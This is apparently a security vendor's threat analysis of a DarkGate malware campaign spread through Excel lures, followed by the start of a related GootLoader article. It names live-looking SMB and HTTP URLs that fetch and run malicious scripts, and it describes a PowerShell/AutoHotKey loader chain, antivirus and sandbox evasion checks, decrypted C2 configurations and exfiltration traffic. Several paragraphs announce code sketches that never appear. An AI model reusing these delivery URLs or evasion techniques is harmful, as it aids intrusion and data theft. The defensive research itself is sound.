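The filename templates above can be turned into a rough matcher for triage. The following is a minimal sketch, not a vetted detection rule: it assumes <NUM> is one or more digits and <DD> is a one- or two-digit day, and because the <DATE> format is not specified here, that part is matched loosely. The function and list names are hypothetical.

```python
import re

# Hypothetical regexes derived from the filename templates listed above.
# Assumptions: <NUM> = digits, <DD> = 1-2 digit day, <DATE> = any run of
# non-space characters (its real format is not given in the article).
LURE_PATTERNS = [
    r"paper\d+-\d{1,2}-march-2024\.xlsx",
    r"march-D\d+-2024\.xlsx",
    r"ACH-\d+-\d{1,2}March\.xlsx",
    r"attach#\d+-\S+\.xlsx",
    r"01 CT [A-Za-z]+ [A-Za-z]+\.xlsx",
    r"april2024-\d+\.xlsx",
    r"statapril2024-\d+\.xlsx",
]
_COMPILED = [re.compile(p, re.IGNORECASE) for p in LURE_PATTERNS]


def matches_lure_name(filename: str) -> bool:
    """Return True if the filename fits one of the assumed lure templates."""
    return any(rx.fullmatch(filename) for rx in _COMPILED)
```

A match on the name alone is weak evidence, so a check like this is better suited to prioritizing files for closer inspection than to blocking.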

If the user opens the .xlsx file in Excel, they are shown the template, pictured in Figure 4 below, that contains a linked object for the Open button.

Screenshot of Excel Online interface displaying a message about files from the cloud, with an 'Open' button to enable editing.
Figure 4. Template used by .xlsx files used in this DarkGate campaign.

When a user clicks the hyperlinked object for the Open button in the spreadsheet, it retrieves and runs content from a URL found in the spreadsheet archive's drawing.xml.rels file. This URL points to a Samba/SMB share that is publicly accessible and hosts a VBS file. An example is:

  • file:///\\167.99.115[.]33\share\EXCEL_OPEN_DOCUMENT.vbs

As the attack further evolved, the attackers also started sharing JS files from these Samba shares.

  • file:///\\5.180.24[.]155\azure\EXCEL_DOCUMENT_OPEN.JS..........

While the Microsoft Azure cloud service platform (CSP) is mentioned within the URL, there is no known connection between this malware and the Azure CSP. The threat actors could use this tactic to give the URL a sense of legitimacy and to avoid or obscure detection.
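To illustrate how an analyst might surface such links, the sketch below opens a spreadsheet as a ZIP archive and lists external relationship targets that point at a file:/// or UNC path. It scans every .rels part rather than assuming one exact path, and the function name is hypothetical.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Namespace used by relationship (.rels) parts in Office Open XML packages.
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def find_external_file_targets(xlsx_bytes: bytes):
    """Return (part name, target) pairs for external file:/// or UNC targets."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as archive:
        for name in archive.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(archive.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                target = rel.get("Target", "")
                is_external = rel.get("TargetMode", "") == "External"
                # Flag only external targets that use file:///\\host or \\host.
                if is_external and target.lower().startswith(("file:///\\\\", "\\\\")):
                    hits.append((name, target))
    return hits
```

Calling find_external_file_targets(open(path, "rb").read()) on a suspicious workbook would return any such targets for review. This reads the archive only and never resolves the link.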

The EXCEL_OPEN_DOCUMENT.vbs file contains a large amount of junk code related to printer drivers, but the important script that retrieves and runs the follow-up PowerShell script is highlighted below in Figure 5.

A screenshot displaying a section of computer code in an IDE. The code includes error handling constructs in a programming language, with keywords like 'if', 'echo', 'set', and 'end if' prominently featured. Several lines are indented for logical structure. The image shows a focus on generating and handling error messages with placeholders for user text and system descriptions. Several lines are highlighted in purple.
Figure 5. Section of code from EXCEL_OPEN_DOCUMENT.vbs with code to request and run the next stage PowerShell script highlighted in purple.

For Excel files with embedded objects that use Samba links to .js files instead of .vbs files, the JavaScript shows a similar function to retrieve and run the follow-up PowerShell script. Figure 6 shows a file named 11042024_1545_EXCEL_DOCUMENT_OPEN.js that performs this similar function.

Screenshot of computer code written in a programming environment. The code snippet features function definitions and script execution commands using PowerShell and ActiveXObject to perform web-based actions. The URI included in the script is "wassonsite dot com/yrqnsfla". The functions are named "wbbnrkg" and involve popup and run methods.
Figure 6. Section of code from a .js file to run the next-stage PowerShell script.

Code from the .vbs or .js file downloads and runs a PowerShell script. This PowerShell script downloads three files and uses them to start the AutoHotKey-based DarkGate package. An example is shown below in Figure 7.

Screenshot displaying a PowerShell script involving commands for changing directory, downloading files using Invoke-WebRequest, executing scripts, and modifying file attributes. The script includes URLs and file names like 'a.bin', 'script.ahk', and 'test.txt'.
Figure 7. PowerShell script to download and run the AutoHotKey-based DarkGate package.

In some cases, these PowerShell scripts attempt an interesting evasion tactic. Below in Figure 8, we find an example of a PowerShell script that checks if Kaspersky anti-malware software is installed by detecting if the directory C:/ProgramData/Kaspersky Lab exists. If this directory exists, the PowerShell script downloads the legitimate AutoHotKey.exe, possibly as an evasion tactic to avoid triggering Kaspersky anti-malware.

If C:/ProgramData/Kaspersky Lab does not exist, the PowerShell script downloads ASCII text representing hexadecimal code for Autohotkey.exe, saves the result as a.bin and uses certutil.exe with the -decodehex parameter to decode a.bin to the AutoHotKey.exe binary. Figure 8 shows details of this script.

Screenshot displaying a script. The script includes various command lines in PowerShell, focusing on web requests, file handling, and execution of an AutoHotkey script. The text editor has a dark background with colored syntax highlighting to differentiate commands, parameters, and strings. A large section is highlighted in purple.
Figure 8. PowerShell script to install DarkGate with the check for Kaspersky anti-malware software highlighted in purple.
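The hex-decoding step can be reproduced offline when examining a downloaded a.bin. The sketch below is a Python stand-in for that step, not the script's own code: it assumes the file holds plain hexadecimal digits, optionally separated by whitespace, and the helper names are hypothetical.

```python
def decode_hex_text(hex_text: str) -> bytes:
    """Convert ASCII hexadecimal text (whitespace allowed) into raw bytes."""
    # bytes.fromhex skips ASCII whitespace between byte pairs.
    return bytes.fromhex(hex_text)


def looks_like_pe(data: bytes) -> bool:
    """True if the data starts with the 'MZ' magic of a Windows executable."""
    return data[:2] == b"MZ"
```

For example, looks_like_pe(decode_hex_text(text)) gives a quick check that the decoded content is an executable before hashing it and comparing against the AutoHotKey hash listed in the indicators.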

We have also found similar checks and evasion techniques in AutoHotKey scripts (.ahk) and AutoIt3 scripts (.au3 or .a3x) in the DarkGate package.

The PowerShell scripts in Figures 7 and 8 both reference a file named test.txt. This file contains the final shellcode for DarkGate, but it is obfuscated. The legitimate Autohotkey.exe runs the malicious AutoHotKey script script.ahk, which deobfuscates test.txt and loads it into memory to run as the DarkGate executable.

The script.ahk file has several comment lines with random English words that inflate the file to more than 50 KB. The functional AutoHotKey script is only 13 lines of code. Figure 9 below shows an example of this functional script.

The image displays a snippet of computer code. It involves memory operations with API calls such as "VirtualAlloc" and contains detailed parameters and function usage. The text mentions file manipulation, involving reading from a file "text.txt" located in the script directory. The image also includes explicit usage of data types like "UInt", "Char", and includes hexadecimal constants and operations. There is also an execution of a Dynamic Link Library (DLL) via "DllCall". The code is highlighted in syntax-coloring common in development environments, enhancing readability.
Figure 9. An example of script.ahk stripped of its comment lines.

A Closer Look at DarkGate Malware

Deobfuscated from test.txt and run from system memory, this final DarkGate binary is known for its complex mechanisms to avoid detection and malware analysis. By analyzing its shellcode, we can gain a deeper understanding of the malware's functionality and identify ways to counteract its anti-analysis techniques.

Checking CPU Information as an Anti-Analysis Technique

One of the anti-analysis techniques employed by DarkGate is identifying the CPU of the targeted system. This can reveal if the threat is running in a virtual environment or on a physical host, enabling DarkGate to cease operations to avoid being analyzed in a controlled environment.

Figure 10 shows the routine to check for a victim system's CPU when analyzing the final DarkGate executable in a debugger.

Screenshot of computer code in an IDE showing function calls and a highlighted text line displaying CPU specification: "Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz @ 2 Cores."
Figure 10. DarkGate's routine to check for the CPU shown in a debugger.

Detecting Multiple Anti-Malware Programs

In addition to checking CPU information, DarkGate malware also scans for multiple other anti-malware programs on the targeted system. By identifying installed anti-malware software, DarkGate can avoid triggering their detection mechanisms or even disable them to further evade analysis.

Table 1 lists the anti-malware programs and their corresponding directory paths or filenames, which DarkGate uses to detect their presence on a system.

| Anti-Malware Brand | Checks for Location (Directory) or Running Process (Filename) |
|---|---|
| Bitdefender | C:\ProgramData\Bitdefender; C:\Program Files\Bitdefender |
| SentinelOne | C:\Program Files\SentinelOne |
| Avast | C:\ProgramData\AVAST; C:\Program Files\AVAST Software |
| AVG | C:\ProgramData\AVG; C:\Program Files\AVG |
| Kaspersky | C:\ProgramData\Kaspersky Lab; C:\Program Files (x86)\Kaspersky Lab |
| Eset-Nod32 | C:\ProgramData\ESET; egui.exe (ESET GUI) |
| Avira | C:\Program Files (x86)\Avira |
| Norton | ns.exe; nis.exe; nortonsecurity.exe |
| Symantec | smc.exe |
| Trend Micro | uiseagnt.exe |
| McAfee | mcuicnt.exe |
| SUPERAntiSpyware | superantispyware.exe |
| Comodo | vkise.exe; cis.exe |
| Malwarebytes | C:\Program Files\Malwarebytes; mbam.exe |
| ByteFence | bytefence.exe |
| Search & Destroy | sdscan.exe |
| 360 Total Security | qhsafetray.exe |
| Total AV | totalav.exe |
| IObit Malware Fighter | C:\Program Files (x86)\IObit |
| Panda Security | psuaservice.exe |
| Emsisoft | C:\ProgramData\Emsisoft |
| Quick Heal | C:\Program Files\Quick Heal |
| F-Secure | C:\Program Files (x86)\F-Secure |
| Sophos | C:\ProgramData\Sophos |
| G DATA | C:\ProgramData\G DATA |
| Windows Defender | C:\Program Files (x86)\Windows Defender |

Table 1. Anti-malware programs and their directory paths.
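The logic behind Table 1 amounts to a lookup of directories and process names per brand. The sketch below models that lookup as a pure function over supplied inputs, which can help when reasoning about what a given analysis host would look like to this check. It covers only a subset of the table, it is not DarkGate's code, and the names are hypothetical.

```python
from typing import Dict, Iterable, List, Set

# Subset of Table 1. Entries ending in ".exe" are process names;
# all other entries are directory paths.
AV_INDICATORS: Dict[str, List[str]] = {
    "Kaspersky": [r"C:\ProgramData\Kaspersky Lab",
                  r"C:\Program Files (x86)\Kaspersky Lab"],
    "Eset-Nod32": [r"C:\ProgramData\ESET", "egui.exe"],
    "Norton": ["ns.exe", "nis.exe", "nortonsecurity.exe"],
    "Malwarebytes": [r"C:\Program Files\Malwarebytes", "mbam.exe"],
}


def brands_present(existing_dirs: Iterable[str], running: Iterable[str]) -> Set[str]:
    """Return the brands whose directory or process indicators are present."""
    dirs = {d.lower() for d in existing_dirs}
    procs = {p.lower() for p in running}
    found = set()
    for brand, indicators in AV_INDICATORS.items():
        for item in indicators:
            key = item.lower()
            if (key.endswith(".exe") and key in procs) or key in dirs:
                found.add(brand)
    return found
```

Passing the inputs in, rather than querying the live system, keeps the sketch testable and makes the case-insensitive comparison explicit.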

As DarkGate has evolved, its developers have implemented updates to include new anti-malware checks, such as those for Windows Defender and SentinelOne. This demonstrates the malware's continuous evolution and adaptation to bypass the latest security measures.

Identifying Malware Analysis and Anti-VM Tools

DarkGate malware not only checks for CPU information and anti-malware programs but also scans the host's running processes. It does this to confirm that normal Windows processes are running and that no processes associated with malware analysis or a virtual machine (VM) environment are present.

Unwanted processes can include popular reverse engineering tools, debuggers or virtualization software. Identifying these processes helps DarkGate take appropriate action to avoid detection or hinder analysis of the malware.

Figure 11 shows the output of a debugger from a DarkGate sample checking through running processes for VM-related programs or malware analysis tools. This reveals several strings that relate to normal Windows processes and others for VM environments and malware analysis tools. DarkGate checks for these on an infected host before proceeding with its infection activity.

Screen filled with hexadecimal code and corresponding ASCII text, showing various system processes like 'svchost.exe' and 'smsvchost.exe.'
Figure 11. Output from a debugger, revealing names of various processes identified by a DarkGate sample.

The list of active programs or processes that the DarkGate sample checked through (also in Figure 11) is shown below:

  • system
  • smss.exe
  • csrss.exe
  • wininit.exe
  • winlogon.exe
  • services.exe
  • lsass.exe
  • svchost.exe
  • dwm.exe
  • spoolsv.exe
  • VGAuthService.exe
  • Vm3dservice.exe (VMware process for video rendering)
  • Vmtoolsd.exe (VMware process for VMware tools)
  • MsMpEng.exe
  • dllhost.exe
  • WmiPrvSE.exe
  • sihost.exe
  • GoogleUpdate.exe
  • taskhostw.exe
  • RuntimeBroker.exe
  • explorer.exe
  • msdtc.exe
  • SearchIndexer.exe
  • ShellExperienceHost.exe
  • NisSrv.exe
  • OneDrive.exe
  • sedsvc.exe
  • X32dbg.exe (Debugging software)
  • Ida.exe (IDA binary code analysis tool)
  • ProcessHacker.exe (Process Hacker analysis tool)
  • notepad++.exe
  • OutputPE.exe
  • SearchUI.exe
  • audiodg.exe

Decryption of Configuration Data

After gathering information about the targeted system's hardware, anti-malware programs and running processes, DarkGate malware incorporates this data into its decryption routine for its configuration. This configuration consists of multiple fields, each containing specific information the malware uses to adapt its behavior and evade detection. By adjusting its actions based on the collected data, the malware can better avoid analysis and remain hidden on the infected system.

In the most recent versions of DarkGate, the function to decrypt the configuration receives the encrypted buffer, buffer size and a hard-coded XOR key as inputs. It then creates a new decryption key using the provided key and proceeds to decrypt the configuration buffer as shown in Figures 12 and 13.

Figure 12 shows the output of a debugger from a DarkGate sample first seen on March 14, 2024, after decrypting its configuration data.

The image displays a screen of densely packed hexadecimal codes interspersed with ASCII characters, indicative of a data dump or computer code analysis. The included text references URLs, data references, and various technical terms.
Figure 12. Configuration data extracted from a DarkGate sample first seen on March 14, 2024.

Figure 13 shows the output of a debugger from a DarkGate sample first seen on April 16, 2024, after decrypting its configuration data.

A screen filled with hexadecimal numerical values and scattered ASCII characters.
Figure 13. Configuration data extracted from a DarkGate sample first seen on April 16, 2024.
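The general shape of such a routine can be sketched with a repeating-key XOR. This is an illustration under stated assumptions and not DarkGate's actual algorithm: the way the malware derives its working key from the hard-coded key is not described here, so derive_key below is a hypothetical placeholder that returns the key unchanged.

```python
def derive_key(hardcoded_key: bytes) -> bytes:
    """HYPOTHETICAL placeholder for the malware's key-derivation step."""
    # Assumption: the real derivation differs; it is not documented here.
    return hardcoded_key


def xor_decrypt(buffer: bytes, key: bytes) -> bytes:
    """XOR every byte of the buffer with the key, repeating the key as needed."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(buffer))
```

Because XOR is symmetric, the same function both obfuscates and recovers a buffer, which makes a round trip a convenient self-check when experimenting with candidate keys.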

We recently analyzed the configurations from DarkGate malware samples from a variety of campaigns. The fields appear as numbers with no description, but additional research can correlate some of these fields to functions or values of the malware sample.

For example, the raw configuration data shows 25=admin888 in Figures 12 and 13, and further analysis indicates this admin888 is the campaign identifier for those malware samples.

In some cases, the meaning of these fields is not clear. For example, Figures 12 and 13 both reveal an entry labeled 14=Yes, but we have not confirmed the specific function or value of this entry.

Despite these unknown field values, the configuration data can reveal interesting details of DarkGate samples. For example, we found several different hard-coded XOR keys from samples using the same campaign identifier. And some samples with different XOR keys had not only the same campaign identifier, but also the same value for their C2 server.

The different XOR keys for samples with otherwise similar configuration characteristics could possibly be an attempt to hinder analysis of DarkGate samples.

Let's review some examples of configuration data illustrating notable differences in XOR keys. These values are shown in JSON format, so numbers for any unidentified fields are prefaced with the string flag_. For example, 14=Yes from the raw configuration data is shown as "flag_14": "Yes", in JSON format.
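The renaming convention described above can be sketched as a small parser. This assumes the raw configuration has one number=value entry per line, which is an assumption about the layout. Only field 25 is mapped to a name because it is the only mapping stated in this article, and the function name is hypothetical.

```python
import json

# Only the mapping stated in the article; other field numbers stay unnamed.
KNOWN_FIELDS = {"25": "campaign_id"}


def parse_raw_config(raw: str) -> dict:
    """Turn 'number=value' lines into a dict, prefixing unknown fields with flag_."""
    parsed = {}
    for line in raw.splitlines():
        if "=" not in line:
            continue  # skip lines that are not key/value entries
        number, value = line.split("=", 1)
        number = number.strip()
        name = KNOWN_FIELDS.get(number, f"flag_{number}")
        parsed[name] = value.strip()
    return parsed


print(json.dumps(parse_raw_config("14=Yes\n25=admin888"), indent=2))
```

Extending KNOWN_FIELDS as more fields are identified keeps older output comparable, since unidentified entries always keep their flag_ prefix.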

Same Campaign Identifier, Different XOR Keys

Table 2 shows the decrypted configuration comparing two samples from May 2024 in JSON format with the same campaign_id value but different xor_key values.

Configuration From DarkGate Sample Seen as Early as May 7, 2024:

"C2": "updateleft.com",
"check_ram": false,
"crypter_rawstub": "DarkGate",
"crypter_dll": "R0ijS0qCVITtS0e6xeZ",
"crypter_au3": 6,
"flag_14": true,
"port": 80,
"startup_persistence": true,
"flag_32": false,
"anti_vm": true,
"min_disk": false,
"min_disk_size": 100,
"anti_analysis": true,
"min_ram": false,
"min_ram_size": 4096,
"check_disk": false,
"flag_21": false,
"flag_22": false,
"flag_23": true,
"flag_31": false,
"flag_24": ".newtarget",
"campaign_id": "admin888",
"flag_26": false,
"xor_key": "SbCjRKFB",
"flag_28": false,
"flag_29": 2

Configuration From DarkGate Sample Seen as Early as May 20, 2024:

"C2": "wear626.com",
"flag_8": "No",  
"crypter_rawstub": "DarkGate",  
"crypter_dll": "R0ijS0qCVITtS0e6xeZ",  
"crypter_au3": "6",  
"flag_14": "Yes",  
"port": "80",  
"startup_persistence": "No",  
"flag_32": "No",  
"check_display": "Yes",  
"check_disk": "No",  
"min_disk_size": "100",  
"check_ram": "No",  
"min_ram_size": "4096",  
"check_xeon": "No",  
"flag_21": "Yes",  
"flag_22": "No",  
"flag_23": "No",  
"flag_31": "No",  
"flag_24": "traf",  
"campaign_id": "admin888",  
"flag_26": "No",  
"xor_key": "TNduHZgm",  
"flag_28": "No",  
"flag_29": "2",  
"flag_34": "No"

Table 2. Configuration comparison from two DarkGate samples with the same campaign identifier but different hard-coded XOR keys.

Same Campaign Identifier and C2 Server, Different XOR Keys

Table 3 shows the decrypted configuration comparing two samples from April 2024 in JSON format with the same C2 and campaign_id values but different xor_key values.

Configuration From DarkGate Sample Seen as Early as April 10, 2024:

"C2": "78.142.18.222",
"flag_8": "No",
"crypter_rawstub": "DarkGate",
"crypter_dll": "R0ijS0qCVITtS0e6xeZ",
"crypter_au3": "6",
"flag_14": "Yes",
"port": "80",
"startup_persistence": "No",
"flag_32": "No",
"check_display": "No",
"check_disk": "No",
"min_disk_size": "100",
"check_ram": "No",
"min_ram_size": "4096",
"check_xeon": "No",
"flag_21": "Yes",
"flag_22": "No",
"flag_23": "No",
"flag_31": "No",
"campaign_id": "tompang",
"flag_26": "No",
"xor_key": "ClUqWMEv",
"flag_28": "No",
"flag_29": "6",
"flag_33": "No"

Configuration From DarkGate Sample Seen as Early as April 27, 2024:

"C2": "78.142.18.222",
"flag_8": "No",  
"crypter_rawstub": "DarkGate",  
"crypter_dll": "R0ijS0qCVITtS0e6xeZ",  
"crypter_au3": "6",  
"flag_14": "Yes",  
"port": "80",  
"startup_persistence": "No",  
"flag_32": "No",  
"check_display": "No",  
"check_disk": "No",  
"min_disk_size": "100",  
"check_ram": "No",  
"min_ram_size": "4096",  
"check_xeon": "No",  
"flag_21": "Yes",  
"flag_22": "No",  
"flag_23": "No",  
"flag_31": "No",  
"campaign_id": "tompang",  
"flag_26": "No",  
"xor_key": "VzJaSPos",  
"flag_28": "No",  
"flag_29": "2"

Table 3. Configuration comparison from two DarkGate samples with the same campaign identifier and the same C2 server but different hard-coded XOR keys.
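The comparisons in Tables 2 and 3 can be generalized by grouping decrypted configurations on shared fields and collecting the XOR keys seen in each group. The sketch below uses only the C2, campaign_id and xor_key values from the four samples above; the helper name is hypothetical.

```python
from collections import defaultdict

# Values taken from the four configurations shown in Tables 2 and 3.
SAMPLES = [
    {"C2": "updateleft.com", "campaign_id": "admin888", "xor_key": "SbCjRKFB"},
    {"C2": "wear626.com", "campaign_id": "admin888", "xor_key": "TNduHZgm"},
    {"C2": "78.142.18.222", "campaign_id": "tompang", "xor_key": "ClUqWMEv"},
    {"C2": "78.142.18.222", "campaign_id": "tompang", "xor_key": "VzJaSPos"},
]


def keys_by(configs, *fields):
    """Group configs by the given fields and collect each group's XOR keys."""
    groups = defaultdict(set)
    for cfg in configs:
        groups[tuple(cfg[f] for f in fields)].add(cfg["xor_key"])
    return dict(groups)


for group, keys in keys_by(SAMPLES, "campaign_id", "C2").items():
    print(group, sorted(keys))
```

Any group that ends up with more than one key reproduces the pattern the tables highlight: matching campaign details with different hard-coded XOR keys.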

DarkGate C2 Traffic

DarkGate C2 traffic uses unencrypted HTTP requests, but the data is obfuscated and appears as Base64-encoded text. Figure 14 shows the initial HTTP POST request for C2 traffic from a DarkGate infection on March 14, 2024.

A screenshot of Wireshark software displaying an HTTP stream, capturing and showing detailed network packet data with various headers and hexadecimal values visible on the screen.
Figure 14. Text stream of the initial HTTP POST request from a DarkGate infection on March 14, 2024.

This Base64-encoded text can be decoded, but the result is further obfuscated. Other research reveals how this data can be fully deobfuscated.
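A quick way to confirm this observation on captured traffic is to attempt a standard Base64 decode and measure how much of the output is printable. The sketch below assumes the standard Base64 alphabet, which may not match what the malware uses, and it does not attempt the further deobfuscation. The helper names are hypothetical.

```python
import base64
import binascii
from typing import Optional


def try_base64(text: str) -> Optional[bytes]:
    """Decode text as standard Base64, or return None if it is not valid."""
    try:
        return base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return None


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII (0.0 for empty input)."""
    if not data:
        return 0.0
    return sum(32 <= b < 127 for b in data) / len(data)
```

A body that decodes cleanly but yields a low printable ratio is consistent with a second layer of obfuscation underneath the Base64 text.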

In our infection run on March 14, 2024, we saw what appears to have been data exfiltration in five HTTP POST requests sending nearly 218 KB of data as shown below in Figure 15.

The image shows a screenshot of a network traffic log from Wireshark displayed in a table format. The columns are labeled from left to right as Time, ID, Dot, port, Host, Content-Length, and Info. The rows list different network exchanges with entries detailing timestamps in 'YYYY-MM-DD hh:mm:ss' format, various IP addresses under 'Dot', port numbers, and the domain 'nextroundstr.com' under 'Host'. All the traffic requests are POST requests shown under the 'Info' column. Some rows feature black arrows pointing to the right, indicating specific entries highlighted within the log.
Figure 15. HTTP POST requests for DarkGate C2 traffic filtered in Wireshark, showing possible data exfiltration.

When reviewing a text stream of the traffic, this possible data exfiltration also shows as Base64-encoded text sent over HTTP POST requests. Figure 16 shows one such example from the infection from March 14, 2024.

A screenshot of Wireshark software displaying an HTTP stream, capturing and showing detailed network packet data with various headers and hexadecimal values visible on the screen.
Figure 16. Text stream of an HTTP POST request sending approximately 218 KB of information for possible data exfiltration.

While we've seen indicators of data exfiltration from DarkGate C2 traffic, other sources have reported follow-up malware from DarkGate like Danabot. Furthermore, threat actors reportedly using the DarkGate MaaS have previously been associated with ransomware activity.

Conclusion

DarkGate malware represents a significant and adaptable threat in the cybercrime ecosystem, possibly filling the gap left by the dismantlement of Qakbot after August 2023. With its multi-faceted attack vectors and evolution into a full-fledged MaaS offering, DarkGate demonstrates a high level of complexity and persistence.

Campaigns using this malware exhibit advanced infection techniques, leveraging both phishing strategies and approaches like exploiting publicly accessible Samba shares. As DarkGate continues to evolve and refine its methods of infiltration and resistance to analysis, it remains a potent reminder of the need for robust and proactive cybersecurity defenses.

Product Protection

Palo Alto Networks customers are better protected from the threats discussed in this article through the following products:

  • Cortex XDR blocks the DarkGate samples referenced in this post as well as the various stages and payloads, and it provides extensive protection through cloud-based static and dynamic analysis capabilities.
  • Next-Generation Firewall with Cloud-Delivered Security Services including Advanced WildFire, Advanced URL Filtering and Advanced Threat Prevention are able to recognize these domains or C2 URLs as malicious. They can also instrument the full attack chain and identify the malicious behaviors and anti-sandbox evasions. Examples of signatures include:
    • Virus/Win32.WGeneric.efigim
    • Virus/Win32.WGeneric.efypas
    • Virus/Win32.WGeneric.efhzig
  • Next-Generation Firewall with the Advanced Threat Prevention security subscription can help block the attacks with best practices via the following Threat Prevention signature: 86902.
  • The Prisma Cloud Defender Agent can detect the malware files referenced in this article using signatures generated by Advanced WildFire products and protect cloud-based VMs.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

SHA256 hashes for initial lures used in the March-April 2024 campaign distributing DarkGate malware:

SHA256 Hash File Description
378b000edf3bfe114e1b7ba8045371080a256825f25faaea364cf57fa6d898d7 XLSX file containing embedded object pointing to SMB URL hosting JS file
ba8f84fdc1678e133ad265e357e99dba7031872371d444e84d6a47a022914de9 XLSX file containing embedded object pointing to SMB URL hosting VBS file
a01672db8b14a2018f760258cf3ba80cda6a19febbff8db29555f46592aedea6 XLSX file containing embedded object pointing to SMB URL hosting VBS file
02acf78048776cd52064a0adf3f7a061afb7418b3da21b793960de8a258faf29 XLSX file containing embedded object pointing to SMB URL hosting VBS file
2384abde79fae57568039ae33014184626a54409e38dee3cfb97c58c7f159e32  XLSX file containing embedded object pointing to SMB URL hosting VBS file
4b45b01bedd0140ced78e879d1c9081cecc4dd124dcf10ffcd3e015454501503  XLSX file containing embedded object pointing to SMB URL hosting VBS file
08d606e87da9ec45d257fcfc1b5ea169b582d79376626672813b964574709cba  XLSX file containing embedded object pointing to SMB URL hosting VBS file
585e52757fe9d54a97ec67f4b2d82d81a547ec1bd402d609749ba10a24c9af53  XLSX file containing embedded object pointing to SMB URL hosting JS file
51f1d5d41e5f5f17084d390e026551bc4e9a001aeb04995aff1c3a8dbf2d2ff3  XLSX file containing embedded object pointing to SMB URL hosting JS file
44a54797ca1ee9c896ce95d78b24d6b710c2d4bcb6f0bcdc80cd79ab95f1f096  XLSX file containing embedded object pointing to SMB URL hosting JS file
b28473a7e5281f63fd25b3cb75f4e3346112af6ae5de44e978d6cf2aac1538c1  XLSX file containing embedded object pointing to SMB URL hosting JS file

Examples of SHA256 hashes for JS or VBS files used for DarkGate infections:

  • 96e22fa78d6f5124722fe20850c63e9d1c1f38c658146715b4fb071112c7db13
  • f9d8b85fac10f088ebbccb7fe49274a263ca120486bceab6e6009ea072cb99c0
  • 2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f

Examples of SHA256 hashes for PowerShell scripts used for DarkGate infections:

  • 9b2be97c2950391d9c16497d4362e0feb5e88bfe4994f6d31b4fda7769b1c780
  • 9a2a855b4ce30678d06a97f7e9f4edbd607f286d2a6ea1dde0a1c55a4512bb29
  • 51ab25a9a403547ec6ac5c095d904d6bc91856557049b5739457367d17e831a7
  • b4156c2cd85285a2cb12dd208fcecb5d88820816b6371501e53cb47b4fe376fd

SHA256 hash for copy of AutoHotKey EXE used for these infections (not malicious):

  • 897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb

Examples of the URLs used to retrieve and run AutoHotKey packages for DarkGate malware:

March 12, 2024:

  • hxxp://adfhjadfbjadbfjkhad44jka[.]com/aa
  • hxxp://adfhjadfbjadbfjkhad44jka[.]com/xxhhodrq
  • hxxp://adfhjadfbjadbfjkhad44jka[.]com/zanmjtvh

March 13, 2024:

  • hxxp://nextroundst[.]com/aa
  • hxxp://nextroundst[.]com/ffcxlohx
  • hxxp://nextroundst[.]com/nlcsphze

March 15, 2024:

  • hxxp://diveupdown[.]com/aa
  • hxxp://diveupdown[.]com/aaa
  • hxxp://diveupdown[.]com/hlsxaifp
  • hxxp://diveupdown[.]com/yhmrmmgc
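The URLs above are defanged (hxxp and [.]) so they cannot be clicked by accident. When loading them into a blocklist or search query, a small helper can restore them and extract the unique hostnames. This is a minimal sketch with hypothetical function names.

```python
from urllib.parse import urlsplit


def refang(indicator: str) -> str:
    """Restore a defanged URL: hxxp -> http and [.] -> ."""
    return indicator.replace("hxxp", "http", 1).replace("[.]", ".")


def domains(indicators):
    """Return the sorted unique hostnames found in defanged URLs."""
    return sorted({urlsplit(refang(item)).hostname for item in indicators})
```

For the URLs listed above, domains() reduces the ten entries to three hostnames, which is usually the more practical unit for DNS or proxy log searches.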

Additional Resources

Dissecting GootLoader With Node.js

Executive Summary

This article shows how to circumvent anti-analysis techniques from GootLoader malware while using Node.js debugging in Visual Studio Code. This evasion technique used by GootLoader JavaScript files can present a formidable challenge for sandboxes attempting to analyze the malware.

Sandboxes with limited computing resources can struggle to analyze a large volume of binaries. Malware often takes advantage of this to evade analysis by delaying its malicious actions, which is commonly described as “sleeping.”

GootLoader is a backdoor and loader malware that its operators have actively distributed through fake forum posts. The infection process of GootLoader starts with a JavaScript file.

Palo Alto Networks customers are better protected from these threats through our Next-Generation Firewall with Cloud-Delivered Security Services including Advanced WildFire, as well as through Cortex XDR. If you think you might have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team.

Related Unit 42 Topics GootLoader, Evasion, Memory Detection

Background

Gootkit was first reported in 2014, and it underwent many changes over time. In 2020, at least one source identified a JavaScript-based type of malware named Gootkit Loader, which its operators distributed through fake forum posts. The group behind this campaign has kept the same distribution tactic and as of 2024 they continue using fake forum posts that are nearly identical in appearance.

Many security vendors shorten Gootkit Loader to GootLoader when referring to these JavaScript files. While the original Gootkit malware was a Windows executable, GootLoader is JavaScript-based malware, and it can deliver other types of malware, including ransomware.

Since January 2024, we have investigated several GootLoader samples. The infection chain is shown below in Figure 1.

INFECTION CHAIN: fake forum page>link for ZIP download>downloaded ZIP archive>victim double-clicks JS file from ZIP>GootLoader installs and is made persistent through scheduled task>GootLoader web-based C2 traffic
Figure 1. Flowchart for a GootLoader infection we saw in March 2024.

Sandboxing is a widely adopted method of identifying malicious binaries that involves analyzing the behavior of binaries within a controlled environment. Sandboxes encounter hurdles when analyzing a large volume of binaries with limited computing resources.

Malware often exploits these challenges by intentionally delaying malicious actions within the sandbox to conceal its true intent. These delaying actions are commonly described as the malware sleeping.

Common Ways for JavaScript Malware to Sleep

The most common way for malware to sleep is to simply call the methods Wscript.sleep() or setTimeout(). However, many sandboxes easily detect these methods. In the following paragraphs we dissect one of the least-mentioned methods GootLoader uses to evade detection.
